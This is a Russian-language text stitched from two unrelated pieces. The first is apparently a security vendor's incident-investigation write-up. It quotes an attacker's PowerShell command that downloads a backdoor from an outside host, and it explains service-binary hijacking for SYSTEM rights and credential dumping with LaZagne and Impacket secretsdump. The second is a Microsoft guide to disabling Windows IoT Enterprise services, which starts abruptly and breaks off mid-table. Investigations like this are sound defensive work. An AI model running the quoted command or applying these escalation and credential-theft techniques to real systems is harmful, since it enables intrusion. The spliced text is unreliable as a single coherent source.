Поищем происхождение файла 1.exe на comp-65.hv-logistics.stf (10.156.24.219) в MaxPatrol SIEM. Если посмотреть события в сессии w_pitts, то мы опять видим скачивание через PowerShell с использованием invoke-webrequest, где lg4.win был сохранен как 1.exe: Invoke-WebRequest -Uri http://lg4.ptsecurity.net/zhaya/lg4.win -OutFile C:\Users\Public\1.exe.

Сам исполняемый файл мы можем вытащить из PT NAD и отправить на анализ в PT Sandbox. Поведенческий анализ свидетельствует о том, что 1.exe содержит бэкдор (рис. 23).

Иногда бывает полезно анализировать не только строку запуска вредоносного файла, но и другие процессы, где он мог фигурировать как объект (мы сегодня уже делали так, чтобы выяснить, как файл был передан на узел). Но иногда можно увидеть и другие полезные для расследования события. Например, на скриншоте выше (рис. 23) видно, как атакующие подменили оригинальный исполняемый файл zabbix-agent.exe на полезную нагрузку — файл 1.exe. Проведя разведку на узле, хакеры обнаружили, что имеют права на запись в папку C:\Zabbix\bin\, где находится zabbix-agent.exe, который использует сервис Zabbix. Таким образом, при перезапуске службы атакующие получили обратное соединение на свой сервер и смогли исполнять команды на узле с правами SYSTEM.

Часто оказывается так, что у пользователя есть права на запись службы в папку, но нет прав на ее перезапуск. Тогда, если тип запуска службы — auto, можно просто перезагрузить узел. При старте системы службы начнут запускаться, и Zabbix запустит полезную нагрузку, а атакующие получат обратное соединение с уже такими желанными правами системы.

Конечно, в этом случае атакующие теряют из памяти lsass.exe пароли и хеши пользователей, которые ранее интерактивно входили на узел. А там могли быть учетные данные какого-нибудь администратора, которые полезны для дальнейшего продвижения по сети.

Кстати, lsass.exe — далеко не единственное место, откуда можно извлечь учетные данные. Один из способов — это получить из реестра кэшированные доменные учетные данные. Последние десять доменных входов кэшируются для того, чтобы доменный пользователь мог войти в систему, если по какой-то причине контроллер домена недоступен. Извлекать эти данные умеет известный инструмент LaZagne: для этого сохраняются ветки реестра hklm\sam, hklm\system и hklm\security, что хорошо видно на скриншоте ниже.

Стоит сказать, что у LaZagne есть много функций, и инструмент может получать данные не только из реестра, но и из сохраненных паролей для подключения к сетям Wi-Fi, из паролей, сохраненных в браузерах, в файлах конфигураций. Кроме того, в LaZagne есть модуль Pypykatz — это интерпретация Mimikatz на языке Python.

Чтобы понять, какие учетные данные потенциально оказались в руках атакующих, мы проверяем пользователей, которые входили на узел в последнее время. Пользователь administrator нам неинтересен, он локальный, а вот r_flores_admin — это уже любопытно, так как мы видели, что он использовался для дальнейших атак.

Итак, нам в нашем расследовании осталось ответить всего на два вопроса:

1. Как атакующие получили доступ на comp-65.hv-logistics.stf (10.156.24.219).
2. Откуда были получены учетные данные пользователя e_puckett, которого использовали для входа на RDG.

Начнем со второго: этот вопрос сложнее и потребует от нас навыков настоящего третхантера. То есть нужно выдвинуть гипотезу, а затем ее проверить.

Предполагаем, что учетные данные e_puckett были сдамплены с какого-то узла. Значит, нам надо найти все узлы, на которые e_puckett осуществлял интерактивный вход (logon_type in [2,7,11,10]). Список состоит всего из одного узла — comp-187.hv.logistics.stf (10.156.24.3). Значит, посмотрим на все взаимодействия между ним и теми узлами, которые находятся под контролем атакующих. И. Это headshot! Мы видим сработавшее на удаленный дамп учетных данных правило. Если перейти к исходным событиям, то становится ясно, что использовался инструмент Impacket secretsdump (для него характерны сетевой вход, доступ к именованным каналам svcctl и winreg, сохранение результатов в файл со случайным именем и расширением .tmp в C:\Windows, а затем чтение этого файла по SMB).

На самом деле Threat Hunting далеко не всегда бывает таким быстрым и удачным, каким он оказался в этом примере. Перед этим нам пришлось cформулировать множество гипотез, и их проверка закончилась провалом. Мы искали, где атакующие завладели учетной записью e_puckett еще с того момента, когда впервые увидели ее использование на сервере RDG. В итоге раскручивание цепочки шаг за шагом привело нас к ответу. Сама атака была распределенная и заняла у команды атакующих трое суток, а вот на раскручивание цепочки нам суммарно потребовалось 8–10 часов.

Точка входа

Вернемся к w_pitts. Мы помним, что файл 1.exe был создан процессом powershell.exe. Часто для понимания полной картины происходящего на узле приходится строить цепочку процессов, то есть искать событие за событием, сверяя PID и имена процессов. К счастью, MaxPatrol SIEM умеет это делать самостоятельно. Нужный нам процесс powershell.exe даже попал в цепочку для правила корреляции Malicious_Office_Document на вредоносный документ. Убедившись, что это именно тот самый powershell.exe, можно сделать вывод, что в 12:22 пользователь w_pitts получил фишинговое письмо и открыл вложение. Если посмотреть на цепочку, то видно, что пользователь запустил почтовый клиент, открыл вложение в виде DOC-файла, который запустил powershell.exe и начал выполнять команды.

Это же письмо мы можем найти в PT Sandbox. Поведенческий анализ явно говорит о вредоносности вложения.

Заключение

Давайте соберем все факты воедино и попробуем подвести итог расследования.

Атакующие отправили фишинговое письмо (якобы с резюме), которые было открыто сотрудником отдела кадров w_pitts, благодаря чему хакеры получили обратное соединение на свой C2-сервер. Быстро найдя способ повысить привилегии в системе, они получили учетные данные администратора r_flores_admin, что позволило им чувствовать себя очень свободно в инфраструктуре компании. Немного побродив по пользовательскому сегменту и получив контроль еще над парой учетных записей, нападающие поняли, что в этом сегменте крупной рыбы не поймаешь и надо двигаться дальше. Дверь в серверный сегмент им открыла не запатченная вовремя уязвимость в сервисе создания запросов в техподдержку iTop. Оттуда хакеры быстро переместились на сервер RDG, которому по протоколу удаленного рабочего стола (RDP) открыт доступ практически на любой узел любого сегмента. Воспользовавшись этим и даже не заглянув в сегмент администраторов, атакующие кинулись к системам SCADA реализовывать недопустимое событие.

Нужно было всего одно письмо, и понеслось: разведка, закрепление, повышение привилегий, горизонтальное перемещение — и вот атакующие уже в сегменте АСУ ТП управляют вашим телетрапом. Примерный их путь к реализации недопустимого события состоял из шести этапов (см. скриншот ниже).

В реальной жизни наша основная задача — не давать атакующим возможности реализовывать недопустимые события и пресекать все их действия на этапе продвижения. При грамотном управлении процессами мониторинга и реагирования на инциденты информационной безопасности, а также при наличии эффективных правил обнаружения подобные атаки в компаниях могут быть обнаружены и остановлены уже на самом первом этапе — получении фишинговых писем.

Надеемся, наша статья поможет вам взглянуть на угрозы, процессы threat hunting и расследования под другим углом.

Руководство по отключению системных служб в Windows IoT Enterprise

Операционная система Windows содержит множество системных служб, которые предоставляют важные функции. Разные службы имеют разные политики запуска по умолчанию: некоторые запускаются по умолчанию (автоматически), некоторые при необходимости (вручную), а некоторые отключены по умолчанию и должны быть явно включены для запуска. Эти настройки по умолчанию были тщательно выбраны для каждой службы, чтобы сбалансировать производительность, функциональность и безопасность для типичных клиентов.

Тем не менее, некоторые клиенты Интернета вещей могут предпочесть более ориентированный на безопасность баланс для своих устройств Интернета вещей Windows, который сокращает область атак до абсолютного минимума и поэтому может потребоваться полностью отключить все службы, которые не требуются в конкретных средах. Для этих клиентов корпорация Майкрософт (Microsoft®) предоставляет сопроводительное руководство относительно того, какие службы можно безопасно отключить для вышеуказанной цели.

Руководство предназначено только для клиентов Windows IoT Enterprise.

Клиенты могут настроить свои устройства Интернета вещей Windows для отключения выбранных служб с помощью шаблонов безопасности в групповых политиках или с помощью автоматизации PowerShell. В некоторых случаях в руководство включены конкретные параметры групповой политики, которые напрямую отключают функциональные возможности службы вместо отключения самой службы.

Корпорация Майкрософт рекомендует клиентам отключить следующие службы и соответствующие запланированные задачи в Windows IoT Корпоративная:

1. Диспетчер проверки подлинности Xbox Live
2. Сохранение игр на Xbox Live

1. \Microsoft\XblGameSave\XblGameSaveTask.
2. \Microsoft\XblGameSave\XblGameSaveTaskLogon.

Отключение служб, не установленных по умолчанию

Корпорация Майкрософт не рекомендует применять политики для отключения служб, которые не установлены по умолчанию.

• Если компонент установлен, эта служба обычно требуется. Для установки службы или компонента требуются права администратора. Запретите установку компонента, а не запуск службы.
• Блокировка службы Microsoft Windows не мешает администратору (или, в некоторых случаях, не администратору) устанавливать аналогичный сторонний аналог, возможно, с более высоким риском для безопасности.
• Конфигурация базового состояния или тест производительности, который отключает нестандартную службу Windows (например, W3SVC), может создать у некоторых аудиторов ошибочное представление о том, что технология (например, IIS) изначально небезопасна и никогда не должна использоваться.
• Если компонент (и служба) так и не устанавливается, это просто приведет к появлению ненужной нагрузки в конфигурации базового состояния и в процессе проверки.

Для всех системных служб, перечисленных в этом документе, в следующих двух таблицах приведены пояснения по столбцам и рекомендации Майкрософт по включению и отключению системных служб в Windows IoT Корпоративная.

Описание столбцов

Имя	Описание
Имя службы	Основное (внутреннее) название службы.
Описание	Описание службы из sc.exe описание.
Установка	Всегда устанавливать: служба устанавливается в Windows IoT Enterprise.
Тип запуска	Тип запуска службы в Windows IoT Корпоративная
Рекомендация	Рекомендации и советы Майкрософт по отключению этой службы в Windows IoT Enterprise в типичном хорошо управляемом развертывании.
Комментарии	Дополнительное объяснение.

Объяснение рекомендаций корпорации Майкрософт

Имя	Описание
Нет рекомендаций	Влияние отключения этих служб не было полностью оценено. Поэтому стандартную конфигурацию этих служб не следует изменять.
Не отключать	Отключение этой службы повлияет на основные компоненты или помешает правильной работе определенных ролей или компонентов. Поэтому ее не следует отключать.
Можно отключить	Такая служба предоставляет функциональные возможности, которые полезны для некоторых компаний. Компании, для которых важна безопасность и которые не используют эту службу, могут ее спокойно отключить.
Уже отключена	Эта служба отключена по умолчанию (нет необходимости применять политику).
Следует отключить	Эту службу никогда не следует включать в хорошо управляемой корпоративной системе.

В следующих таблицах приведены рекомендации Майкрософт по отключению системных служб в Windows IoT Корпоративная.

Установщик ActiveX

Имя	Описание
Имя службы	AxInstSV
Описание	Обеспечивает проверку контроля учетных записей пользователей для установки элементов ActiveX из Интернета и позволяет управлять установкой элемента ActiveX на основе параметров групповой политики. Эта служба запускается по требованию, и, если она отключена, установка элементов ActiveX будет осуществляться в соответствии с параметрами браузера по умолчанию.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Среда выполнения активации агента

Имя	Описание
Имя службы	AarSvc_3bc9c
Описание	Среда выполнения для активации приложений агента общения
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба маршрутизатора AllJoyn

Имя	Описание
Имя службы	AJRouter
Описание	Выполняет маршрутизацию сообщений AllJoyn для локальных клиентов AllJoyn. Если эта служба остановлена, клиенты AllJoyn, у которых нет собственных маршрутизаторов, не смогут работать.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба готовности приложений

Имя	Описание
Имя службы	AppReadiness
Описание	Возвращает приложения, готовые к использованию при первом входе пользователя на это устройство и при добавлении новых приложений.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба удостоверений приложения

Имя	Описание
Имя службы	AppIDSvc
Описание	Определяет и проверяет удостоверение приложения. Отключение этой службы делает невозможным применение AppLocker.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба сведений о приложениях

Имя	Описание
Имя службы	Appinfo
Описание	Облегчает запуск интерактивных приложений с дополнительными правами администратора. Если эта служба остановлена, пользователи не смогут запускать приложения с дополнительными правами администратора, которые могут им потребоваться для выполнения некоторых задач.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба шлюза уровня приложения

Имя	Описание
Имя службы	ALG
Описание	Обеспечивает поддержку сторонних подключаемых модулей протоколов для общего доступа к подключению Интернета.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Управление приложениями

Имя	Описание
Имя службы	AppMgmt
Описание	Обрабатывает запросы на установку, удаление и перечисление программного обеспечения, развернутого с помощью групповой политики. Если служба отключена, пользователи не смогут устанавливать, удалять или перечислять программное обеспечение, развернутое с помощью групповой политики. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба развертывания AppX (AppXSVC)

Имя	Описание
Имя службы	AppXSvc
Описание	Обеспечивает поддержку инфраструктуры для развертывания приложений Store. Эта служба запускается по требованию, и, если она отключена, приложения Store не будут развернуты в системе и могут работать неправильно.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба AssignedAccessManager

Имя	Описание
Имя службы	AssignedAccessManagerSvc
Описание	Служба AssignedAccessManager поддерживает работу киоска в Windows.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Средство автоматического обновления часового пояса

Имя	Описание
Имя службы	tzautoupdate
Описание	Автоматически устанавливает часовой пояс системы.
Установка	Всегда устанавливается
Тип запуска	Отключен
Рекомендации	Уже отключена
Комментарии	Нет

Служба AVCTP

Имя	Описание
Имя службы	BthAvctpSvc
Описание	Это служба транспортного протокола управления аудио видео
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Фоновая интеллектуальная служба передачи

Имя	Описание
Имя службы	BITS
Описание	Передает файлы в фоновом режиме, используя незанятую пропускную способность сети. Если служба отключена, то любые приложения, зависящие от BITS, такие как клиентский компонент Центра обновления Windows или MSN Explorer, не смогут автоматически скачивать программы и другие сведения.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Службы инфраструктуры фоновых задач

Имя	Описание
Имя службы	BrokerInfrastructure
Описание	Служба инфраструктуры Windows, управляющая фоновыми задачами, которые могут выполняться в системе.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Базовый модуль фильтрации

Имя	Описание
Имя службы	BFE
Описание	Базовый модуль фильтрации (BFE) — это служба, которая управляет политиками брандмауэра и IPsec и осуществляет фильтрацию в пользовательском режиме. Остановка или отключение службы BFE значительно снизит безопасность системы. Это также приведет к непредсказуемому поведению в приложениях управления IPsec и брандмауэра.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба шифрования дисков BitLocker

Имя	Описание
Имя службы	BDESVC
Описание	BDESVC размещает службу шифрования дисков BitLocker. Шифрование диска BitLocker обеспечивает безопасный запуск операционной системы, а также полное шифрование томов для ОС, фиксированных или съемных томов. Эта служба позволяет BitLocker запрашивать у пользователей различные действия, связанные с их томами при подключении, и автоматически разблокирует тома без участия пользователя. Кроме того, он сохраняет сведения о восстановлении в Active Directory, если они доступны, и, при необходимости, гарантирует использование последних сертификатов восстановления. Остановка или отключение службы не позволит пользователям использовать эту функцию.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба модуля резервного копирования на уровне блоков

Имя	Описание
Имя службы	wbengine
Описание	Служба WBENGINE используется программа архивации данных для выполнения операций резервного копирования и восстановления. Если эта служба остановлена пользователем, это может привести к сбою выполняемой операции резервного копирования или восстановления. Отключение этой службы может привести к отключению операций резервного копирования и восстановления с помощью программа архивации данных на этом компьютере.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

Служба аудиошлюза Bluetooth

Имя	Описание
Имя службы	BTAGService
Описание	Служба, поддерживающая роль аудиошлюза профиля Bluetooth Handsfree.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба поддержки Bluetooth

Имя	Описание
Имя службы	bthserv
Описание	Служба Bluetooth поддерживает обнаружение и сопоставление удаленных устройств Bluetooth. Остановка или отключение этой службы может привести к неправильной работе уже установленных устройств Bluetooth и помешать обнаружению или сопоставлению новых устройств.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба поддержки пользователей Bluetooth

Имя	Описание
Имя службы	BluetoothUserService_3bc9c
Описание	Служба пользователя Bluetooth поддерживает надлежащую функциональность функций Bluetooth, относящихся к каждому сеансу пользователя.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

BranchCache

Имя	Описание
Имя службы	PeerDistSvc
Описание	Эта служба кэширует сетевое содержимое из одноранговых узлов в локальной подсети.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба диспетчера доступа к возможностям

Имя	Описание
Имя службы	camsvc
Описание	Предоставляет средства для управления доступом приложений UWP к возможностям приложений, а также для проверки доступа приложения к определенным возможностям приложения.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба отслеживания

Имя	Описание
Имя службы	CaptureService_3bc9c
Описание	Включает дополнительные функции захвата экрана для приложений, вызывающих API Windows.Graphics.Capture.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Cellular Time (Время мобильной сети)

Имя	Описание
Имя службы	autotimesvc
Описание	Эта служба устанавливает время на основе сообщений NITZ из мобильной сети.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба распространения сертификатов

Имя	Описание
Имя службы	CertPropSvc
Описание	Копирует пользовательские и корневые сертификаты со смарт-карт в хранилище сертификатов текущего пользователя, определяет, когда смарт-карта вставлена ​​в устройство для чтения смарт-карт и, если необходимо, устанавливает мини-драйвер Plug-and-Play для смарт-карты.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба клиентских лицензий (ClipSVC)

Имя	Описание
Имя службы	ClipSVC
Описание	Обеспечивает поддержку инфраструктуры для Microsoft Store. Эта служба запускается по требованию, и, если ее отключить, приложения, приобретенные с помощью Microsoft Store, будут работать неправильно.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба пользователей буфера обмена

Имя	Описание
Имя службы	cbdhsvc_3bc9c
Описание	Эта служба пользователя используется для сценариев буфера обмена
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба изоляции ключей CNG

Имя	Описание
Имя службы	KeyIso
Описание	Служба изоляции ключей CNG размещается в процессе LSA. Она обеспечивает изоляцию процессов с закрытыми ключами и связанных с ними криптографических операций в соответствии с общими критериями. Служба хранит и использует долгоживущие ключи в безопасном процессе в соответствии с требованиями общих критериев.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Система событий COM+

Имя	Описание
Имя службы	EventSystem
Описание	Поддерживает службу уведомлений о системных событиях (SENS), которая обеспечивает автоматическое распространение событий подписавшимся компонентам Component Object Model (COM). Если служба остановлена, SENS закроется и не сможет предоставлять уведомления о входе и выходе из системы. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Системное приложение COM+

Имя	Описание
Имя службы	COMSysApp
Описание	Управляет настройкой и отслеживанием компонентов на основе модели COM+. Если служба остановлена, большинство компонентов на основе COM+ не будут работать должным образом. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба платформы подключенных устройств

Имя	Описание
Имя службы	CDPSvc
Описание	Эта служба используется для выполнения сценариев «подключенные устройства и универсальная прозрачность»
Установка	Только с возможностями рабочего стола
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Служба пользователей платформы подключенных устройств

Имя	Описание
Имя службы	CDPUserSvc_3bc9c
Описание	Эта пользовательская служба используется для сценариев платформы подключенных устройств.
Установка	Только с возможностями рабочего стола
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Функциональные возможности для подключенных пользователей и телеметрия

Имя	Описание
Имя службы	DiagTrack
Описание	Служба «Функциональные возможности для подключенных пользователей и телеметрия» обеспечивает функции, которые поддерживают работу подключенных пользователей в приложении. Кроме того, эта служба управляет сбором информации на основе событий и передачей диагностических сведений и сведений об использовании (используемых для улучшения работы и качества платформы Windows), когда в разделе «Обратная связь и диагностика» включены параметры диагностики и конфиденциальности использования.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

ConsentUX

Имя	Описание
Имя службы	ConsentUxUserSvc_3bc9c
Описание	Позволяет ConnectUX и pc Settings подключаться и связываться с дисплеями Wi-Fi и устройствами Bluetooth.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба контактных данных

Имя	Описание
Имя службы	PimIndexMaintenanceSvc
Описание	Индексирует данные контактов для их быстрого поиска. Если вы остановите или отключите эту службу, данные контактов могут отсутствовать в результатах поиска.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

CoreMessaging

Имя	Описание
Имя службы	CoreMessagingRegistrar
Описание	Управляет взаимодействием между компонентами системы.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Диспетчер учетных данных

Имя	Описание
Имя службы	VaultSvc
Описание	Обеспечивает безопасное хранение и получение учетных данных для пользователей, приложений и пакетов служб безопасности.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Диспетчер регистрации учетных данных

Имя	Описание
Имя службы	CredentialEnrollmentManagerUserSvc_3bc9c
Описание	Диспетчер регистрации учетных данных
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

службы шифрования

Имя	Описание
Имя службы	CryptSvc
Описание	Предоставляет три службы управления: службу базы данных каталога, которая подтверждает подписи файлов Windows и позволяет устанавливать новые программы; защищенную корневую службу, которая добавляет и удаляет сертификаты доверенного корневого центра сертификации с этого компьютера; службу автоматического обновления корневых сертификатов, которая извлекает корневые сертификаты из клиентского компонента Центра обновления Windows и включает такие сценарии, как SSL. Если эта служба остановлена, эти службы управления не будут работать должным образом. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба совместного доступа к данным

Имя	Описание
Имя службы	DsSvc
Описание	Выполняет функции посредника при передаче данных между приложениями.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Использование данных

Имя	Описание
Имя службы	DusmSvc
Описание	Использование данных сети, ограничение данных, ограничение фоновой передачи данных в сетях с лимитным тарифным планом.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Средство запуска серверных процессов DCOM

Имя	Описание
Имя службы	DcomLaunch
Описание	Служба DCOMLAUNCH запускает серверы COM и DCOM в ответ на запросы на активацию объектов. Если эта служба остановлена ​​или отключена, программы, использующие COM или DCOM, не будут работать должным образом. Настоятельно рекомендуется, чтобы служба DCOMLAUNCH была запущена.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Оптимизация доставки

Имя	Описание
Имя службы	DoSvc
Описание	Выполняет задачи оптимизации доставки содержимого
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба сопоставления устройств

Имя	Описание
Имя службы	DeviceAssociationService
Описание	Обеспечивает связывание между системой и проводными или беспроводными устройствами.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба установки устройств

Имя	Описание
Имя службы	DeviceInstall
Описание	Позволяет компьютеру распознавать изменения аппаратной части и адаптироваться к ним практически без участия пользователя. Остановка или отключение этой службы приведет к нестабильности работы системы.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба регистрации управления устройством

Имя	Описание
Имя службы	DmEnrollmentSvc
Описание	Выполняет действия по регистрации устройств для управления устройствами
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

служба маршрутизации push-сообщений Управление устройствами wap

Имя	Описание
Имя службы	dmwappushservic
Описание	Маршрутизирует push-сообщения, полученные устройством по протоколу WAP, и синхронизирует Управление устройствами сеансах
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

Диспетчер настройки устройств

Имя	Описание
Имя службы	DsmSvc
Описание	Обеспечивает обнаружение, скачивание и установку программного обеспечения, относящегося к устройствам. Если эту службу отключить, то устройства могут быть настроены с устаревшим программным обеспечением и работать неправильно.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

DevicePicker

Имя	Описание
Имя службы	DevicePickerUserSvc_3bc9c
Описание	Эта служба пользователя используется для управления пользовательским интерфейсом Miracast, DLNA и DIAL.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

DevicesFlow

Имя	Описание
Имя службы	DevicesFlowUserSvc_3bc9c
Описание	Позволяет ConnectUX и pc Settings подключаться и связываться с дисплеями Wi-Fi и устройствами Bluetooth.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Брокер фонового обнаружения DevQuery

Имя	Описание
Имя службы	DevQueryBroker
Описание	Позволяет приложениям обнаруживать устройства с фоновыми задачами
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

DHCP-клиент

Имя	Описание
Имя службы	Dhcp
Описание	Регистрирует и обновляет IP-адреса и DNS-записи для этого компьютера. Если эта служба остановлена, этот компьютер не сможет получать динамические IP-адреса и выполнять обновления DNS. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Diagnostic Execution Service (Служба выполнения диагностики)

Имя	Описание
Имя службы	diagsvc
Описание	Выполняет диагностические действия для поддержки устранения неполадок.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба политики диагностики

Имя	Описание
Имя службы	DPS
Описание	Служба политики диагностики позволяет обнаруживать проблемы с компонентами Windows, выполнять их диагностику и устранять их. Если эта служба остановлена, диагностика не будет работать.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Узел службы диагностики.

Имя	Описание
Имя службы	WdiServiceHost
Описание	Узел службы диагностики используется службой политики диагностики для размещения диагностики, которая должна выполняться в контексте локальной службы. Если эта служба остановлена, любая диагностика, которая зависит от нее, больше не будет работать.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Узел системы диагностики

Имя	Описание
Имя службы	WdiSystemHost
Описание	Узел системы диагностики используется службой политики диагностики для размещения диагностики, которая должна выполняться в контексте локального компьютера. Если эта служба остановлена, любая диагностика, которая зависит от нее, больше не будет работать.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба блокировки диалогов

Имя	Описание
Имя службы	DialogBlockingService
Описание	Служба блокировки диалогов
Установка	Всегда устанавливается
Тип запуска	Отключен
Рекомендации	Уже отключена
Комментарии	Нет

Служба улучшения отображения

Имя	Описание
Имя службы	DisplayEnhancementService
Описание	Служба для управления улучшением отображения, таким как управление яркостью.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба политики отображения

Имя	Описание
Имя службы	DispBrokerDesktopSvc
Описание	Управляет подключением и настройкой локальных и удаленных дисплеев
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Клиент отслеживания изменившихся связей

Имя	Описание
Имя службы	TrkWks
Описание	Поддерживает связи между файлами NTFS внутри компьютера или между компьютерами в сети.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Координатор распределенных транзакций

Имя	Описание
Имя службы	MSDTC
Описание	Координирует транзакции, охватывающие несколько диспетчеров ресурсов, таких как базы данных, очереди сообщений и файловые системы. Если остановить эту службу, эти транзакции не будут выполнены. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

DNS-клиент.

Имя	Описание
Имя службы	Dnscache
Описание	Служба DNS-клиента (dnscache) кэширует имена DNS и регистрирует полное имя этого компьютера. Если служба остановлена, разрешение имен DNS будет продолжаться. Однако результаты запросов имен DNS не будут кэшироваться, и имя компьютера не будет зарегистрировано. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Диспетчер скачанных карт

Имя	Описание
Имя службы	MapsBroker
Описание	Служба Windows для доступа приложений к скачанным картам. Эта служба запускается по требованию, когда приложение обращается к скачанным картам. Отключение этой службы сделает невозможным доступ приложений к картам.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Отключение этой службы прерывает работу приложений, которые от нее зависят. Можно отключить, если приложения от нее не зависят.

Встроенный режим

Имя	Описание
Имя службы	embeddedmode
Описание	Служба «Встроенный режим» позволяет выполнять сценарии, относящиеся к фоновым приложениям. Если отключить эту службу, фоновые приложения не будут активироваться.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Шифрованная файловая система (EFS)

Имя	Описание
Имя службы	Файловая система EFS
Описание	Предоставляет основную технологию шифрования файлов, которая используется для хранения зашифрованных файлов в томах файловой системы NTFS. Если эта служба остановлена или отключена, доступ приложений к зашифрованным файлам не обеспечивается.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба управления корпоративными приложениями

Имя	Описание
